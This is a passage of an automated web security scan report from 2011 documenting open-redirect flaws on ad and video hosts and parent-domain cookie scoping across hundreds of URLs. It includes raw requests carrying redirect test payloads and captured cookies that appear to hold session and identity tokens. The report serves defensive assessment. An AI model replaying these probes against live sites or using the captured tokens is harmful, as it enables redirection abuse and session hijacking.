The value of the trg request parameter is used to perform an HTTP redirect. The payload http%3a//aff678c0f8818bcd6/a%3fhttp%3a//b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366%3f%3bord%3d860849269%3f was submitted in the trg parameter. This caused a redirection to the following URL:

http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http%3a//aff678c0f8818bcd6/a%3fhttp%3a//b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366%3f%3bord%3d860849269%3f HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 361
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Set-Cookie: C2=3pMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/
Set-Cookie: F1=BcnyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/
...[SNIP]...

15.10. http://video.fr.sympatico.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://video.fr.sympatico.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a6103e627b507d6ae/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://video.redacted?mkt=fr-ca&.a6103e627b507d6ae/=1

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.a6103e627b507d6ae/=1 HTTP/1.1
Host: video.fr.sympatico.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 03:04:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=fr-ca&.a6103e627b507d6ae/=1
Cache-Control: private
Content-Length: 0

15.11. http://video.sympatico.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://video.sympatico.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a94ca25af6512fea/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://video.redacted?mkt=en-ca&brand=sympatico&.a94ca25af6512fea/=1

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.a94ca25af6512fea/=1 HTTP/1.1
Host: video.sympatico.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 03:04:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Machine: S02
Location: http://video.redacted?mkt=en-ca&brand=sympatico&.a94ca25af6512fea/=1
Cache-Control: private
Content-Length: 0

16. Cookie scoped to parent domain previous next
There are 302 instances of this issue:

http://c.microsoft.com/trans_pixel.aspx
http://msn.whitepages.com/
http://silverlight.codeplex.com/
http://t.mookie1.com/t/v1/imp
http://www.amazon.com/gp/product/0470650923
http://www.amazon.com/gp/product/0672333368
http://www.amazon.com/gp/product/0981511821
http://www.amazon.com/gp/product/184968006X
http://www.amazon.com/gp/product/1935182374
http://www.bing.com/travel/
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do
http://www.bing.com/travel/deals/last-minute-flight-deals.do
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751
http://www.bing.com/travel/hotels
http://www.dailygrail.com/
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.kanoodle.com/
http://www.kanoodle.com/ajax/search_spy_data.html
http://www.kanoodle.com/ajax/search_spy_data_today.html
http://www.kanoodle.com/search_spy.html
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.popsci.com/
http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.zacks.com/
http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227
http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6
http://ad.doubleclick.net/click
http://ad.doubleclick.net/clk
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308
http://add.my.yahoo.com/rss
http://ads.revsci.net/adserver/ako
http://alex-johnson.newsvine.com/
http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php
http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://articles.redacted/news/news.aspx
http://athima-chansanchai.newsvine.com/
http://b.rad.redacted/ADSAdClient31.dll
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://boyle.newsvine.com/
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.redcated/c.gif
http://c.bing.com/c.gif
http://c.redacted/c.gif
http://c.statcounter.com/t.php
http://calendar.live.com/calendar/calendar.aspx
http://careers.redacted/
http://clk.redcated/APM/go/139941180/direct
http://clk.redcated/APM/go/148848786/direct
http://clk.redcated/BEL/go/262582811/direct
http://clk.redcated/CNT/go/286609711/direct
http://clk.redcated/CNT/go/287065754/direct
http://clk.redcated/CNT/go/299297287/direct
http://clk.redcated/NFX/go/297941249/direct/01/
http://clk.redcated/ULA/go/296652509/direct
http://clk.redcated/go/286026710/direct
http://clk.redcated/go/286609711/direct
http://clk.redcated/go/287065754/direct
http://clk.redcated/go/296652509/direct
http://clk.redcated/goiframe/184054348/262582811/direct/01
http://clk.redcated/goiframe/199711109/299297287/direct
http://context3.kanoodle.com/cgi-bin/context.cgi
http://conveu.admailtiser.com/st
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://deals.redacted/
http://dg.specificclick.net/
http://editorial.autos.redacted/article.aspx
http://editorial.autos.redacted/articles/default.aspx
http://editorial.autos.redacted/blogs/autosblog.aspx
http://editorial.autos.redacted/media/default.aspx
http://editorial.autos.redacted/media/video/default.aspx
http://editorial.autos.redacted/new-cars/default.aspx
http://editorial.autos.redacted/slideshow.aspx
http://editorial.autos.redacted/used-cars/default.aspx
http://entertainment.redacted/
http://entertainment.redacted/news/
http://entertainment.redacted/video/
http://expression.microsoft.com/en-us/cc136530.aspx
http://health.redacted/
http://helenaspopkin.newsvine.com/
http://ib.adnxs.com/getuid
http://ib.adnxs.com/seg
http://ingame.newsvine.com/
http://js.revsci.net/gateway/gw.js
http://latino.redacted/
http://leadback.advertising.com/adcedge/lb
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/relationships/staticslideshowglamour.aspx
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx
http://lifestyle.redacted/your-life/family-parenting/article.aspx
http://lifestyle.redacted/your-life/new-year-new-you/video.aspx
http://lifestyle.redacted/your-life/your-money-today/article.aspx
http://lifestyle.redacted/your-life/your-money-today/video.aspx
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx
http://lifestyle.redacted/your-look/video/
http://live.newsvine.com/
http://local.redacted/
http://local.redacted/events.aspx
http://local.redacted/gas-traffic.aspx
http://local.redacted/hourly.aspx
http://local.redacted/movies-events.aspx
http://local.redacted/news.aspx
http://local.redacted/restaurants.aspx
http://local.redacted/sports.aspx
http://local.redacted/ten-day.aspx
http://local.redacted/weather.aspx
http://media.fastclick.net/w/tre
http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878
http://michaelwann.newsvine.com/
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/market-news/post.aspx
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/saving-money/50-30-20-budget.aspx
http://redacted/
http://redacted/detail/stock_quote
http://redacted/inc/Attributions.asp
http://redacted/personal-finance/
http://movies.redacted/
http://movies.redacted/academy-awards/snubs/
http://movies.redacted/jason-statham/photo-gallery/feature/
http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/
http://movies.redacted/new-on-dvd/movies/
http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/
http://movies.redacted/showtimes/showtimes.aspx
http://movies.redacted/the-rundown/the-guard/story_5/
http://msdn.microsoft.com/
http://msdn.microsoft.com/en-us/library/cc838158(VS.95
http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx
http://msdn.microsoft.com/en-us/library/ff637515(VS.92
http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx
http://msn.careerbuilder.com/
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx
http://msn.careerbuilder.com/msn/default.aspx
http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845
http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724
http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812
https://msnia.login.live.com/ppsecure/post.srf
http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}
http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}
http://music.redacted/
http://my.live.com/
http://my.redacted/
http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05
http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41
http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx
http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js
http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js
http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://ptsd.eyewonder.com/ewr
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64
http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F
http://realestate.redacted/
http://realestate.redacted/OmRedir.aspx
http://realestate.redacted/article.aspx
http://realestate.redacted/slideshow.aspx
http://redtape.newsvine.com/
https://sb.voicefive.com/b
http://search.redacted/
https://security.live.com/LoginStage.aspx
https://security.live.com/LoginStage.aspx
http://seg.admailtiser.com/st
https://signup.live.com/signup.aspx
https://signup.live.com/signup.aspx
http://social.entertainment.redacted/bloglist.aspx
http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx
http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads
http://specials.redacted/
http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx
http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx
http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx
http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx
http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx
http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx
http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx
http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx
http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx
http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx
http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx
http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx
http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx
http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx
http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx
http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx
http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx
http://specials.redacted/IEIncreaseFont_preview.aspx
http://specials.redacted/alphabet.aspx
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl
http://toddkenreck.newsvine.com/
http://top.newsvine.com/
http://top.newsvine.com/users
http://tv.redacted/
http://tv.redacted/tv/article.aspx
http://us.mc1125.mail.yahoo.com/mc/compose
http://redcated/CNT/iview/299297287/direct
http://wbenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/challenge
http://www.bing.com/events/search
http://www.bing.com/fd/ls/GLinkPing.aspx
http://www.bing.com/fd/ls/l
http://www.bing.com/finance/stockscreener
http://www.bing.com/images/results.aspx
http://www.bing.com/local/ypdefault.aspx
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/msnhomepagehistory.aspx
http://www.bing.com/news/results.aspx
http://www.bing.com/news/search
http://www.bing.com/news/search
http://www.bing.com/results.aspx
http://www.bing.com/sck
http://www.bing.com/search
http://www.bing.com/search
http://www.bing.com/search/
http://www.bing.com/shopping
http://www.bing.com/shopping/bird-feeders/search
http://www.bing.com/shopping/content/search
http://www.bing.com/shopping/healthy-cooking/r/151
http://www.bing.com/shopping/makeup/c/4259
http://www.bing.com/shopping/search
http://www.bing.com/shopping/swimwear/c/4503
http://www.bing.com/shopping/valentines-day-gift-ideas/r/144
http://www.bing.com/travel/content/search
http://www.bing.com/videos/browse
http://www.bing.com/videos/results.aspx
http://www.bing.com/videos/results.aspx
http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo
http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs
http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o
http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy
http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2
http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo
http://www.facebook.com/2008/fbml
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/campaign/impression.php
http://www.facebook.com/sharer.php
http://www.facebook.com/todd.kenreck
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.iis.net/
http://www.live.com/
http://www.morningstar.com/
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/8004316/
http://www.newsvine.com/
http://www.newsvine.com/_action/article/emailThis
http://www.newsvine.com/_action/user/logout
http://www.newsvine.com/_action/user/startTracking
http://www.newsvine.com/_action/user/stopTracking
http://www.newsvine.com/_api/comments/getComments
http://www.newsvine.com/_api/question/getUserData
http://www.newsvine.com/_api/user/convTracker
http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts
http://www.newsvine.com/_nv/api/accounts/login
http://www.newsvine.com/_tools/user/login
http://www.newsvine.com/_vine/js/m1/global.js
https://www.newsvine.com/
https://www.newsvine.com/_action/user/logout
https://www.newsvine.com/_nv/accounts/global/information
https://www.newsvine.com/_nv/accounts/login
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
https://www.newsvine.com/_nv/api/accounts/login
https://www.newsvine.com/_nv/api/accounts/resetPassword
http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.youtube.com/embed/CKZzn00w01M
http://www.youtube.com/embed/mm8byzo8zWE

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

16.1. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; domain=microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=v5Wrg5hY0G1ZKTq92W9PB2I2dXUGcRda9bdvn3lRbyw3vtQVr5yKibRJRo344vn/0+gcIZqwCUZupVUxRhccbbSYfclFWlV45y3+IVUoc/VjkW2CxlqI+BKinJOxY8y1lkTlq5kWs6CF3V9Z5Q6o94Ck6jdBc7u2t8CuSL+TAbTnNTyJ3MYpd4KBFZm4Za8S4IvqsfXWsqT1F0ciAHRsLERgadjlrX8XFWgLVhukLjIREUx+k1Tqr+1MZsnlCuY0GyphPKmFlrT72RxmuWrzHhUSFfvfWxUn649vl7e270SMMTDItio1ndIC5dEVOhZe8xd0Qskq/ep2FTBQaRwMNN+kYzj7574EVGUdnNyjc1tSEPiJxjKw8Rj/clSXreouyHXHIrJuzRzX74axWmeyUjTfyMvvqqonr8jGtpMzwOFukpG63L9tBXL/0mSz8FlXS0uSmHuXScgC1XIJcVG8aWoTnKpZPxIXPVGPh63/vmCnYYUJ3Nxe0yHa3BTDjlef5DOBN0JSNIAp3+N0oVL6SUjutOcU+950gT6kex7wcLk=&Microsoft.MicrosoftId=0237-9950-5424-5770; domain=microsoft.com; expires=Mon, 30-Jan-2012 14:50:57 GMT; path=/
MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; domain=.microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-6&ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&si=1&sv=3.0&fi=1&fv=10.1&r=http%3A%2F%2Fburp%2Fshow%2F42&ts=1296399108879&sr=1920x1200&bs=1020x1715 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; 